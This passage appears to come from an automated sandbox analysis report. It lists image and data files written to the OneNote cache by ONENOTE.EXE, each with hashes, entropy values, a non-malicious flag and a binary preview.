SSDEEP:	96:mQsysOiWdVz5J1oEbAX8M9K6xRyGGp/I1ODzLJd:mQsPWdVz5VbAX8M9K6xRyn/I
MD5:	51FD518E944878F46EC19283DBD70D88
SHA1:	1B5F937A65F5EB36F52AE2F68B0E5F9A9290B09B
SHA-256:	9E733F0680BE115163B28529B9DFD57D2A57F7E0D0D1B2519F59E2D85698A869
SHA-512:	46ADC124B234E164433352FCD2C3501A0355546DCC446C2295B8D46ED74FAF2CE81E1EF2C11F4CB5C0D6752328DDCB600C620BAB91B8155943AE35255BF08A27
Malicious:	false
Preview:	2...>.......h...v...\...................................................................................................................................2...>...D.......v................................I.......I.qk..B.....LZ.............5..+q...<......5..+q...<......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................f...7..0Xo.....N...^.................j..P.H.K....N*........f........................................I.qk..B.....LZ................f...7..0Xo.............f...7..0Xo.........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000064.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	79656
Entropy (8bit):	7.966459570826366
Encrypted:	false
SSDEEP:	1536:2kuUliOeU4os8ii3nF3Hxro/qxXD9u/kjYgMZqoEs6ZUldm:3uUsOXYIAixR2k7WAZV
MD5:	39FF3ACAE544EAC172B1269F825B9E9F
SHA1:	2D40DE8D90BD21D56314D3F99CEF4FBAE3712C0F
SHA-256:	70475431CCA3C91A4EFA3B8F04864371D2D3A45696674A1A0562FE9CD8DB287C
SHA-512:	3B9F3B32696AB7779864E83DC0C45960114A130BEE0CF4D0643DE57FF952171E5D775AA49141EE31A28A9B5D052B26EB421F26EA736D7EF4B3A7EC812CA411CB
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1A.Qa"..q.....2#..BRb..r3$.Cc..Ss.4...D%5&..T...'7....................!1.A..Q.aq..."2.....B3.r.#..R...bc$4..D.s%............?..Y..T.o.\......=.a..j..'^..s..[../........Y.......<...(..4.....7y..Ln.[9.cK.ilN...u@$.V.9.V?3..s.KL.z..w.jW.C.............@.~+.o?o8...k....,.m..9.".....q.....d....z.W...q...~...'..e..>..f#...S.....F....pU.......7..N.vfK......S..G.#.....}.c.........RXt.bq1.`.....[+8\..N..:......}.....r..........')......Na...&...m......c...a4_%d.............co..0.n.L.Q..E.Lt..y.\|..F..4.i(>.._..\.eNL8..?z9I:hLgC.@.p....g.t......'.I!d..?1f..R..........\|..4.wJ..%g..~0bt.....*...v.......O...:.~.>~..o.x...9.@>...s.&.E.0/G.c..t.<..F.t.A.z. ......;.........Gp.P

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000065.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.416895092301275
Encrypted:	false
SSDEEP:	48:YsZ0/E8kUzK+t5vEL7XEWnYPqlBXYmQ97woNrdqr2diHDRXjD3FBJLxn:Ys98z2+3W7XEzaXYmQ97wcRy2eDFJL
MD5:	1B02FB352E1869F084942F2E2DA03A37
SHA1:	AE274DF014074C9B7C400B5B1B55EA77F8EE3478
SHA-256:	DCC5F4399A5DE306DD895F22390A34006D453E992F9F34C19AF0161CA54222D5
SHA-512:	BC9C09AABEBEA083526F6723CA76D844A95099DC8F86676D75E4F961C14D0DFD74E4BB5903AEA345E991520C194B2F83012DD4E7A132B9CF144DE3C37ACB9541
Malicious:	false
Preview:	2...>.......p...v...d.....................................................?....?........................................................................2...>...L.......v................................I.......I.qk..B.....LZ.V.......V.P......<...>.V.P......<...>.V...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............d..Ay....(p.$W.....N...^................R.{QlVB..~..X.2........f................................... ....I.qk..B.....LZ............d..Ay....(p.$W.........d..Ay....(p.$W...........V.......V.......V...........................................V.j.....V.T.]...V.......V...B...V.H.....V...B...V...>.).V...J...................;........4...4...4.."...............V...V...V...z...y.. x.. ...........$........4.....7..7........................;........4...4...4..........V.......V.....#.V.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000066.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40884
Entropy (8bit):	7.545929039957292
Encrypted:	false
SSDEEP:	768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
MD5:	7379775A1E2AB7FAB95CFFCE01AE05F3
SHA1:	3D3DDFD8AC7E07203561BAE423D66F0806833AB3
SHA-256:	9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
SHA-512:	4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000067.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.324775612064059
Encrypted:	false
SSDEEP:	48:YuzistIzoqzDX63teAXEfJc+L/XOv/9Xj1olrdqrgKtjRXITAoDqBy1ZbyUR:YxseDX63dERc+L/XOv/9z1ERygUjbTU
MD5:	EB21DEBCE39DA1DFA5651264E3F549C9
SHA1:	5635CC4EF64B1C0583BAAEBDE8DF915210CF62BD
SHA-256:	ABB1C5DAE2E5A9F28171A0F16B13FA301A53F6976101030335BEF54BF8BA0506
SHA-512:	4CDDD351DA1AAB214DA6C535D2F24A146AA0BC9324A191124AFD226133205705BB94A081F1D49669FF37A1B7C87B611CEDFD239F717845F99A76760573DA5EF2
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ.........:.wh.......M...:.wh.......M.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................)Y...%.4..O.N....N...^...............7f.,..gE..P.h7.........f........................................I.qk..B.....LZ...............)Y...%.4..O.N...........)Y...%.4..O.N....................................................................j......T.]............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4.....7..7........................;........4...4...4......................#.*.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000068.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
Category:	dropped
Size (bytes):	68633
Entropy (8bit):	7.709776384921022
Encrypted:	false
SSDEEP:	1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
MD5:	41241EE59AB7BC9EB34784E3BCE31CB4
SHA1:	98680761A51E9199CF3C89F68B5309FBEC7EE3CB
SHA-256:	035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
SHA-512:	3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000069.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.432454931759613
Encrypted:	false
SSDEEP:	96:5esTIYAJcEg39mX5X/RcJj9T7gTRyjKtI:5esTIjXg39mX5X/qh9T7MRyjK
MD5:	F6CED293A8135EA05C4172D81DD1D026
SHA1:	B3435CD9166023B1832D529F87EA2229EFA988E6
SHA-256:	74AE48DA63C529215B2A44429894B44D41F4082DA77F43784BF127349CFEF46E
SHA-512:	A13646286C8B96B5EDEA82A419CE15EF9670EED4E798C6093752EA6BAEBC46D8F33E5C5F674D3FEDB67B841C85FBE9CB19F8096455EA12396B2853934E31F219
Malicious:	false
Preview:	2...>.......t...v...h...................................................................................................................................2...>...P.......v................................I.......I.qk..B.....LZ...........H..8n..V.8...H..8n..V.8.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................m....dv(@#......N...^...............NTO.X%"K.&.\............f...................................$....I.qk..B.....LZ...............m....dv(@#.............m....dv(@#..........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4.....7..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006A.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 176 x 513, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	11043
Entropy (8bit):	7.96811228801767
Encrypted:	false
SSDEEP:	192:YyroOCsBI9pkCFsHHX2RE6VOlPuIqmBtJNBfAr+ADP1IATaNeTyZ4GF+WQQ6Qwq2:BUOCsB2kCGH32RiPDtDBfArPDP1I/eyM
MD5:	8E9AB9C28B155A66BC5C0DA5E2A4EFB5
SHA1:	972E61F162D48F1CEE21963ECBB2FE439105DB55
SHA-256:	B243A24FA13BC8523450E22F408F9EFF15301C938F8CA52A57018B58CE6785DE
SHA-512:	12062D69E676B3B34AFCEF25AC17B40294282D5BAB6C0110680293D7CC96EC17EBCFE104C284E64A30EE3C483E319E9C37C03F6EE82C79632180E45C7A684E8C
Malicious:	false
Preview:	.PNG........IHDR..............`....`PLTE............................................................................................... .......bKGD....H....cmPPJCmp0712....H.s...*YIDATx^.]...,.N.8.i......0..e..y.......8.6....Fo.........=...F..._..........O..{..............3.\|.L.\|.............>.....v..n.1J...k...."....7........J._.5LQ`..k...._Z.W.x:..k...g..._.....u<.Q{...1...q6.cs...l............30.g...< W...a.5..>O....9}..c..........s\|I.).>.fo4.<q......>...c.:.u..co.#.7,.O..G./.K.\|..q.p...(.(....iH.......m..+.7...../..{W.l....b....?.`^.q.9L&.>.hN2`1..m...]$.0J....rBy......{.._...G....;.r.Q..;..,...9..F...t;.+..2.Ub......V...8.k..5.........'[..s.H..).......%j._.&.....BN..V..q...T...#..........0.E&.o7....$..m..8g.f._$..k.8...5......HgQ...L..\.........)B.I.r.(..8.a..$N.9.=..o..Q..(.e.a..O.....c.= .......$0..X.S,..(p......$..l.c.I...=."......g....^..#~,&.a9iK..ZNE`...pFJ.@Wd?.<..Bt.E.......e...i.%d...}.!..B......9.........B}.....5...;..hL.D.....4z.....\|.)

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006B.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.338097583155894
Encrypted:	false
SSDEEP:	48:QsEJlyhl+HXti4PEQLjXoh9rFotrdqrHlRX25I9BdF:Qsawhl+HXBPEQnX09rFERyFAc
MD5:	CC72C14CED76328B5513A384E762BECC
SHA1:	981FBC2985035524A7535115E3C1CD4F04DED49D
SHA-256:	440607E209D1E6F9F991B0CF1C6820D1ED243211CE39998D21D61D121F14F68B
SHA-512:	87FF3355BBCC19D5C89A07755E1DC25D62DB62AED0D2034DDE2C515007331E91E93F36C99A75153B3349AACB40C8D64AFFA216BC6E308DF60F0D70A9B122BA87
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ...........?......t........?......t..........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............6..K...;..=.J.$....N...^................P...hU@..T.k.........f........................................I.qk..B.....LZ.............6..K...;..=.J.$.........6..K...;..=.J.$........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4.....7..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006C.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 650, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	647
Entropy (8bit):	6.854433034679255
Encrypted:	false
SSDEEP:	12:6v/71rwqZMXVs99W1YvpLp/Fvl+f43ocLtuplb+CrGotLRd:+wqWXVs99rpLpNvr3pIx3b
MD5:	DD876AA103BEC3AC83C769D768AD39FB
SHA1:	1833603AA9B6A7E53F9AD8A336F96CCE33088234
SHA-256:	1262DD23AD54E935CFA10FEB1BE56648E43BEF1116696CA71D87E6E033B1CA7D
SHA-512:	946DB2277213104A3B29EC4388578B05027B974A3093B4CCAD8847397AA51AE308BC6A199E5705E1F901D6E4B1BA34D8DECFD6E5B6685184A307D749D7CFAEDD
Malicious:	false
Preview:	.PNG........IHDR...(.........xk....`PLTE.........................................................................................>.S.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.)..1..7w....6.*.H`T6.ha.k.............b!....Ba..C..P.4K..@.....h.E..X....PX+.P.-.....@@"...o.O4....xZ<...B...B..,A..y.s<......b!....Ba..C..0_p. .......=..,...i. ...=.j..N...........{4+...xZ<...B....\|.....$.K<.vyE..X....PX+.P.-.:... .'p......\,...i. ...=.j........K.....%J..S+.....q..k.H.@DD.s...:..J.K.DDL.\.@`,.DD.:.(]..N....KD....A M.....F..S+.....1.sq........\.t..;..../...~k...4.DD.:..]..N....KD........@DD.s...:..J.K..[...Q....V......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006D.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.373387427377533
Encrypted:	false
SSDEEP:	48:KBsv/LD4jVe2aJOtEKkEjFLuX3CK9jBoUsrdqrKLFt6sRXWbkPk8Qg:Ks7DIw2aJOyEjFCX3Z9jBcRyKhtrppQ
MD5:	C8D4EF0AD390BE8F6AA9BB7EE1AF385D
SHA1:	6CFC92B35FEBCFFE0F1E29E73A85045DD9FCA792
SHA-256:	FD6EB67A705CEA29CA22D696AFEA76E0229DDCAA2B232534C2524329F13DFD9A
SHA-512:	402B083DE373077CA22574685B579598D81209DD9FB1E76F5556C46112CDE3440EAB854C8F08609A76C950F566F06148B82AED03646396606EC7588D6A31D7EF
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZT.......T..b..a.....G.T..b..a.....G.T....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............vZ....j....^........N...^..................\.6.L.......=........f........................................I.qk..B.....LZ............vZ....j....^............vZ....j....^.............T.......T.......T...........................................T..j....T..T.]..T.......T....B..T..H....T....B..T....>.)T....J...................;........4...4...4.."..............T...T...T....z...y.. x.. ...........$........4.....7..7........................;........4...4...4.........T.......T......#T..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006E.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3
Category:	dropped
Size (bytes):	52912
Entropy (8bit):	7.679147474806877
Encrypted:	false
SSDEEP:	1536:DB/nIviNJD9C8kfJj6TkVr4q24FsUpjPc021si:DdnIvi3D9C8Cl6Dq24ayPCz
MD5:	1122BF4C2A42B4FA7F29D3C94954A7C9
SHA1:	3750077A830FE21735A43ABD35C63BA9A4D4B0DE
SHA-256:	423B0DD1A93B391D15B1DC8D8757C3BF5725FF2E7A59E6E3140033E2876B67F6
SHA-512:	4626EFE2EDED2361D6296B57F994DC434CC9D02357A8A6A67D84A544FB8A1CFE0005EA98F846AB963BED7F2B6CE96BC9181182C9459843A52A98D3A731A4FE73
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:27:10............................f.........................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....]+\.9.9.P.d..Z.?~>.-...]6=...........S.9G...b<$..Z..........>.v.o:.o%.e...z.F`...[.wo..z.....k..E...5....G..7.......c2..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006F.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.334725983459085
Encrypted:	false
SSDEEP:	48:lcsRfQzwWLult0Y0EkYWRXjdx97poEsrdqrfusRX8VLf1rPlF:lcsyciulOpEkvXZx97pHsRyverd
MD5:	0B3EDD2AC8629E0329D20BB78BADBFA4
SHA1:	BA69DC3265152E6402F1B436EFB72449F54AF97E
SHA-256:	3F8CC9CCF622DC70400407E42C8D6B875FE83696224043B6300129F72A216C7C
SHA-512:	A0284C1D303A1B9DF8E5F9BD143FD56C904E7D9327F0232E9ACE65800FB9AD73341B2B67C8C4B9A821FDD692E5F1D83987F149F642C5EAAF049C2B6FB7858DFD
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>..........v...v...........................\|.......\|../.O..!.p..Q..I.......I.qk..B.....LZ\|../.O..!.p..Q.\|....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............\p.S...9.q....$....N...^...............d.f..X.F.X%.4.........f........................................I.qk..B.....LZ.............\p.S...9.q....$.........\p.S...9.q....$.........\|.......\|.......\|...........................................\|..j....\|..T.]..\|.......\|....B..\|..H....\|....B..\|....>.)\|....J...................;........4...4...4.."..............\|...\|...\|....z...y.. x.. ...........$........4.....7*..7........................;........4...4...4.........\|.......\|......#\|..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006G.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
Category:	dropped
Size (bytes):	27862
Entropy (8bit):	7.238903610770013
Encrypted:	false
SSDEEP:	384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
MD5:	E62F2908FA5F7189ED8EEBD413928DEE
SHA1:	CA249B4A70924B73BDA52972E9C735AEC35A0C5D
SHA-256:	20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
SHA-512:	EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..\|.Q..I.&.. ......"T4)wdH.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006H.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.489948658676063
Encrypted:	false
SSDEEP:	48:Jits3YEJKUDh2bMtxGb+qE5zAyXgY9bXoRrdqr9UEJPmRXq+NTXHNFJ:Jits0UDogaJE50yXgY9bX4Ry9UsPm9X
MD5:	96B1D5395E41FB7E9F9DF61DFC36EED2
SHA1:	BAD2D6EE2833435D3DA173E697F2B8600AD59DE4
SHA-256:	52D056EEE78620CCD2E2BEC7B9132FAC59E80B30DBBB331486961F8418E4754E
SHA-512:	96F98716DDD2592FF496B955F1E8726D805CD00E68B35EE0210FEFBDFCBFE9E51E2F954A6B1B12C92C1CE0F19F45624EB89B424172FDBC495FAA8C8054A6522B
Malicious:	false
Preview:	2...>.......r...v...f...................................................................................................................................2...>...N.......v................................I.......I.qk..B.....LZ6.......6..9Qg...Eu.f9.=6..9Qg...Eu.f9.=6....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............jv.W..=.OD..v.....N...^..................v(4E.....=._........f..................................."....I.qk..B.....LZ..............jv.W..=.OD..v...........jv.W..=.OD..v..........6.......6.......6...........................................6..j....6..T.]..6.......6....B..6..H....6....B..6....>.)6....J...................;........4...4...4.."..............6...6...6....z...y.. x.. ...........$........4.....7..7........................;........4...4...4.........6.......6......#6..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006I.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 556, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	977
Entropy (8bit):	7.231269197132181
Encrypted:	false
SSDEEP:	12:6v/7QiFJaY/z+obuqFA4fypjQSbtBK+lcqNGSbb7XTJArRRzN5DjNRkPmu5cCbR2:x0QY7xbjy9pY0JPXLTWroeuCCbX0
MD5:	B7F74C18002A81A578A4EE60C407A8D3
SHA1:	70A7D4BB1B3ADF4397D168AD0D81B286F88EBDE0
SHA-256:	95F59A0433050180D4C0E8858B83363D51BEA6752A8B7CA516A8677854D8F5B6
SHA-512:	13186A7CDCE80BCA9D2238666D6D7A989FA1887EABFA5D8A9A63EEC304DFD4BE8EFF652205FA56E1D1CEE7D3680AF8C70A952AF73AB3C246400E8D4EBECBDBA9
Malicious:	false
Preview:	.PNG........IHDR...2...,........A....PLTE...................................................................................................................................................................................$.y.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^...0.D_.......cck.....%a...X.a0Y...-..!.G...[....(.r.H.$...1 .zq.4V.e\|a.6.X..4..kl.%....=w....6..TN.....{.4..T/.z...../.....3..!~..t.#b..^.....E!.SFb ...-.....^...,..C.!.b...i._c...s.X.w.. lsQH..H.gKc@@...i. ....m...;Ci....@G.; V{..lO..\.R9e$..{.....P...E.+.2.0D.B,..P...56.?......K.6..TN....^z.4..T/.z...../.....3..!~..t.]b........E!.SFb ...-.....^...,..C.!.b...i._c..Y.O...?.9k2.M.?5 .n.P...,...d._..%M?....6....,.1..R.4.a.R.+..U.Q..P...vd..T........j .]@....."..lJ../.90.4...Y. ...9.%...{......Hc%.....i..%M?aG..H....o.q.......4.......X.d9.r..CI.O.5.Ri0?.s\b....w...>/k..4V.)Y....P...vd..T........j .]@....."..lJ../.90..2..MP..l..?....K.X.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006J.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.340621982264617
Encrypted:	false
SSDEEP:	96:KZscGTH87D48zE3T1XE9DkejlRyI+rTo5gGqy:sscGTHqD7gj1XE9DkalRy/rTo5gG
MD5:	0F6CD8F15AFF717228F5EF8976BCB1BD
SHA1:	2C0EA08E7FE6018E2776E5D9290E38AAC5E69820
SHA-256:	2DCABAAF31CE42C87D8F837CE456C124A5A32FD99E6E6334F865F10C3D43078D
SHA-512:	627B6DB077429CEB5346EA9C3E2D82D05FC37735B10A00C6CC0FF242E8E91253DB9F9F2919FA923BF370DFF48ED2898BF9A534F42CA2E526F8C21ECE11FA0554
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ............+............+.........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............0unb..(.1.\|...kz....N...^.................z..F<M..e..K..........f........................................I.qk..B.....LZ............0unb..(.1.\|...kz........0unb..(.1.\|...kz................................................................j.....T.]...........B...H.......B.....>.)...J...................;........4...4...4..".....................z...y.. x.. ...........$........4.....7..7........................;........4...4...4....................#.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006K.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	34299
Entropy (8bit):	7.247541176493898
Encrypted:	false
SSDEEP:	768:BrSX4V3P8AIc4KLkHeXRUer0zrhOmXfvG0yH82I:tSXuIc4K2eBtswKsHg
MD5:	E9C52A7381075E4EBC59296F96C79399
SHA1:	BE295AD24D46E2420D7163642B658BF3234A27EA
SHA-256:	D56CEFE9EE2FAE72E31BDBA7DD2AA4426EA22E3CEB22EF68C8F63F9F24D5A8BC
SHA-512:	95CC96DD4459EBAE623176033BA204CCDC50681A768F8CBAE94C16927D140224E49D5197CAE669C83C77010C5C04C1346CF126BEF49DB686F636C5480342A77F
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.......................................................................................!.1..A..Qaq......".#4.2r3.$.%...B.5U&6....Rb.Cs.7..cDTEFVf'...S..dtevw.u.........Gg.....................!1..AQ.aq.2....."#3.4....r..BRb$CS.D............?..5..............#....v.q.m.}\..{....;...r....h.....J..q\|..'.;\..6..v......e...../.k..\|.8..i..\|..]..3e.m....n..Z.GS..n".y..w.-...[a...7A.....i.4.)9\..~C...=.........s..\V]c.D1<./.g.l.&v..~.h..]....zb>G..y:vNS.\......LU....t.{*..Z#.?..v-...wn.rR...P.....y\=.v....../..9_...m4...V.\|.+.o.#.......xj....}..>.s.>C...m.[;.>.p...=^.i.X.(..1...{.F#N.W...xi.z...4..u[{...yO.....8..}\..2...KlX.nbya...2.&.F...R.b.k.7.GV.x.h.y\.Q..O<\>......-...=...r......\......Z.Z...Jf.'....z..Y.q>.p....o..K....h..R..c.lg?......A.Z...Y.q3.L\|.'5...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000006L.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.295005425767137
Encrypted:	false
SSDEEP:	48:Bgsgls20aH1VHUztIM9vtMEHSFLCcXI3c9RVjoxrdqr6BRXQbp3C1Gsu+RS9tB:OsC0zzFMEyFzXIM9HjwRyOylEQt
